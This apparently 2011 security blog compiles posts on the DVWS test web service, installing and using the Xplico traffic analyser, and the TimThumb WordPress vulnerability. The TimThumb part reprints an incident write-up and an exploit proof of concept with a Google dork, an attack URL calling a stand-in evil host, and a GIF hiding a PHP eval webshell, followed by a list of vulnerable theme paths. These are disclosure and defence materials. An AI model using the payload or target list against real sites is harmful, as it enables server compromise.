Aug 6, 2011

Damn Vulnerability Web Service(DVWS) was released

Over the years web services have become an integral part of web and mobile applications. From critical business applications like SAP to mobile applications used by millions, web services are becoming more of an attack vector than ever before. Unfortunately, penetration testers haven't kept up with the popularity of web services, recent advancements in web service technology, testing methodologies and tools. In fact, most of the methodologies and tools currently available either don't work properly, are poorly designed or don't fully test for real world web service vulnerabilities. In addition, environments for testing web service tools and attack techniques have been limited to home grown solutions or worse yet, production environments.
In this presentation Tom, Josh and Kevin will discuss the new security issues with web services and release an updated web service testing methodology that will be integrated into the OWASP testing guide, new Metasploit modules and exploits for attacking web services and a open source vulnerable web service for the Samurai-WTF (Web Testing Framework) that can be used by penetration testers to test web service attack tools and techniques.


Download Link: http://dvws.secureideas.net/downloads/index.html 


Source: http://dvws.secureideas.net/

If you like my blog, Please Donate Me
One Dollar $1.00

Howto: Use Xplico On Backtrack5

Last post, I told you about "Howto: Install Xplico On Backtrack5" and now I will show you how to use it to extract information file from live traffic

1. Start xplico
  - /etc/init.d/xplico start

2. Go to http://localhost:9876 and login with default user and password => xplico:xplico

3. Click the "new case" for create the case and choose "live acquisition" for capture live traffic case


4. Click the case that was create in step#3

5. Create the new session with click "new session" and input the name that you want.

6. Click the session that was created.

7. In the right panel, choose your interface that you want to capture and click "start" button.

8. Try to surf the net and see the result from panel.

If you like my blog, Please Donate Me
One Dollar $1.00

Howto: Install Xplico On Backtrack5

the Xplico “Live capture” is not the great solution to capture the network traffic. The “Live capture” was introduced only for the purpose of demonstration and it can not be considered a proper mode to capture network data.
From 0.6.2 version we have improved the “real time capture” (=> Live capture), but these improvements have not solved (and can not solve) some limits (deliberately) imposed on Xplico. Currently, the real time capture is performed by a plug-in (module) belonging to the Xplico capture modules and not from a separate application. This capture module uses the libpcap to capture data from the network adapter.


1. Install required application and xplico
   - apt-get install xplico tcpdump apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python3-all sqlite3 record sox lame libnet1 libnet1-dev libmysqliteclient-dev binfmt-support

2. Get the GeoLiteCity.dat.gz
   - wget "http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"

3. Extract GeoLiteCity.dat.gz and move it to /opt/xplico
  - gunzip GeoLiteCity.dat.gz
  - mv GeoLiteCity.dat /opt/xplico

4. Install GeoIP
  - wget "http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.8.tar.gz"
  - tar xzvf GeoIP-1.4.8.tar.gz
  - cd GeoIP-1.4.8
  - ./configure
  - make && make install


5. Install Ghostpdl for view the network printer jobs
  - wget "http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-9.02.tar.gz"
  - cd ghostpdl-9.02
  - ./configure
  - make && make install


6. Install videosnarf from http://sourceforge.net/projects/ucsniff/files/videosnarf/. If you use 64bit download "videosnarf_0.63-1_amd64.deb", if not download "videosnarf_0.63-1_i386.deb"
  - wget "http://downloads.sourceforge.net/project/ucsniff/videosnarf/videosnarf_0.63-1_i386.deb?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fucsniff%2Ffiles%2Fvideosnarf%2F&ts=1312631762&use_mirror=nchc"
  - dpkg -i videosnarf_0.63-1_amd64.deb

7. Copy apache2 config file of xplico to /etc/apache2/sites-available/
  - cat /opt/xplico/cfg/apache_xi >> /etc/apache2/site-available/default


8. Change the port that you want to use for manage xplico in /etc/apache2/site-available/xplico and add the below lines into /etc/apache2/ports.conf for binding
# xplico Host port
NameVirtualHost *:9876
Listen 9876



9. Modify /etc/php5/apache2/php.ini for allow upload
post_max_size = 100M
upload_max_filesize = 100M

10. Enable rewrite module of apache2 and restart apache2
  - a2enmod rewrite
  - /etc/init.d/apache2 restart 


11. Browse to http://localhost:9876 for use Web User Interface of xplico


12. If you found blank page when visit the localhost:9876, try to change permission of /opt/xplico for allow apache2 write/read file in that path.
  - chmod 755 -R /opt/xplico
  or
  - chmod 777 -R /opt/xplico


Next time, I will show you how to use the xplico extract file or picture from the pcap file.

If you like my blog, Please Donate Me
One Dollar $1.00

Aug 4, 2011

Timthumb.php Security Vulnerability [Wordpress Theme]


This news is very famous in this week and I got some page to this post for my read. If you want to see full article or detail of the news, please go to the source.

The News
There has been some buzz about a zero day vulnerability found in Timthumb.php that can allow for arbitrary file uploads. Although this is a platform independent issue, it is specially an issue on WordPress where a lot of theme authors choose to include scripts in themes without any extra security measures.
You can read more details about the TimThumb issue here: markmaunder.com
This is definitely an issue, but it’s just the tip of the iceberg. TimThumb is just one of various scripts that are being added to themes/plugins without further vetting, or even incorrectly. Take Uploadify for example, which we’ve recently seen being exploited in very old versions of a popular WordPress theme.

Another issue is inexperience, well, along with laziness in some cases. WordPress has built in a lot of great capabilities that aren’t being properly leveraged. For example, if theme/plugin authors were properly leveraging
add_image_size vs. adding TimThumb they would be in a safer position today.
Unfortunately this is not an easy problem to tackle. WordPress core has a great review and vetting process, it is very controlled for good reason. The problem here is really around plugins and themes, it’s not as simple as you may think to check every release being there are thousands of free and premium options on the market today.

Minimize Your Risk

Here are a few things that if put into practice, will help you minimize the risk of getting exploited:
  1. Keep your themes and plugins updated – #1 cause of malware infections and hacks independent of any platform!
  2. Only download from reputable sources (WordPress.org).
  3. Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework
  4. Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
  5. Don’t just disable, remove any software that you’re not actively using. Just because it’s not active doesn’t mean it’s not vulnerable

Sucuri WordPress Check

Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP Check

How to Use

  1. Save script to your local machine by right clicking the link above and save link as
  2. Login to your site via sFTP or FTP (We recommend sFTP/SSH)
  3. Upload the script to your root WordPress directory
  4. Rename sucuri_wp_check.txt to sucuri_wp_check.php
  5. Run the script via browser of choice – yourdomain.com/sucuri_wp_check.php – Make sure you change the URL path to your domain and wherever you uploaded the file
  6. Check the results

Source: http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html

details and scripts of the WordPress Timthumb.php hack

I also run the latest version of WordPress.org.
My WordPress root directory was writable, but making it read only would not have prevented the hack.
Timthumb.php in it’s default configuration allows site visitors to load images from a predefined set of remote websites for resizing and serving. Timthumb offers a caching mechanism so that it doesn’t have to continually re-process images. The cache directory lives under the wordpress root and is accessible by visitors to the website.
The ability for a site visitor to load content from a remote website and to make the web server write that remote content to a web accessible directory is the cause of the vulnerability in timthumb.php.
To be clear, timthumb.php does not actually execute any remote malicious code that causes this vulnerability. This was a point of confusion among some commenters in my blog post yesterday. It simply gets a remote file and places it in a web accessible directory.
Timthumb only allows remote content from a small range of websites to be loaded remotely. In it’s default configuration these included Blogger, WordPress.com and other sites that are writeable by the general public.
Timthumb’s verification that remote content was only being loaded by these domains was also broken. You could for example load content from hackersiteblogspot.com or from blogspot.com.hackersite.com.
I’ve submitted a patch that fixes the pattern matching and removed all default public hosting sites from the allowed sites list. The developer has opted to keep a small list in which I’m not in favor of.
In my case the hacker uploaded a script to my cache directory which timthumb.php stores as “external_<md5 hash>.php”. He/she then accessed this script directly in my timthumb cache directory as something like http://markmaunder.com/wp-content/themes/Memoir/scripts/cache/external_md5hash.php
The script uploaded was Alucar shell which is base64 encoded and decodes when it executes. That makes it a little harder to find it using grep or similar tool. You can see the encoded version of Alucar here and the decoded version of Alucar here (without the username and password preamble at the top).
Here’s a screenshot of the UI:
This script which gives a web based shell access was then used to inject base64 code to one of my core wordpress files wp-blog-header.php which lives in the wordpress root directory. The file with injected code looked like this.
The decoded version of this base64 code is this. The code executes whenever a blog page is visited. It fetches a file from a URL and writes it to /tmp. Then it executes the php code that is contained in this file. In my case it simply echo’d some javascript code that would show ads. Here is the code contained in the file in /tmp.
Again, this file is periodically updated with new PHP code, so the attacker could have his way with my server until I found out about it. The code could be altered to instead become a spam system and work it’s way through a long list of spam emails.
The way I tracked this to conclusion was:
  • Heard audio on my blog telling me I’d won something.
  • Checked Chrome network tools and saw ad content loading and I don’t serve ads.
  • Grepped wordpress source and themes for hostname I saw in ad. Nothing.
  • Dumped mysql databases on server (all of them) and grepped for hostname. Nothing.
  • Confusion reigns.
  • Started working my way through nginx (which is my front end proxy to apache) and apache access and error logs.
  • Spotted lines in apache error log like this: “[Mon Aug 01 11:09:12 2011] [error] [client 127.0.0.1] PHP Warning: file_get_contents(http://blogger.com.zoha.vn/db/load.php): failed to open stream: HTTP request failed! in /usr/local/markmaunder/wp-content/themes/Memoir/timthumb.php on line 675″
  • Checked timthumb’s cache directory and found Alucar.
  • Realized base64 encoding is why I didn’t find anything with grep.
  • Regrepped wordpress source and database and found injection in wp-blog-header.php
  • Decoded base64 stuff and played with Alucar
  • Found tmp file in /tmp
  • Cleaned everything and fixed permissions. Ran chkrootkit and other utils on machine to see if anything else was compromised. Changed passwords, etc.
Source: http://http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/

Proof-Of-Concept. [PoC]
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
  
  
WordPress TimThumb (Theme) Plugin - Remote Code Execution
  
  
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
 
  
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
 
  
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
  
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
  
  
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.
 
 
Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
 
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
 
 
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
 
(Transparent GIF + <?php @eval($_GET['cmd']) ?>
 
  
  
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
 
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
  
  
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011


Source: http://www.1337day.com/exploits/16592

List of Themes

The Timthumb 0-day security vulnerability is generating a lot of noise and for good reason. If you have a theme that includes TimThumb, your site can be easily hacked.
Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb.
If you use any of the following themes please check to see if the script is present, and make sure it is updated:
8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.php
aranovo/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
aurorae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/includes/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/includes/thumb.php
swift/includes/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
ugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/includes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php
Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.
Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script.
Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.

Source: http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |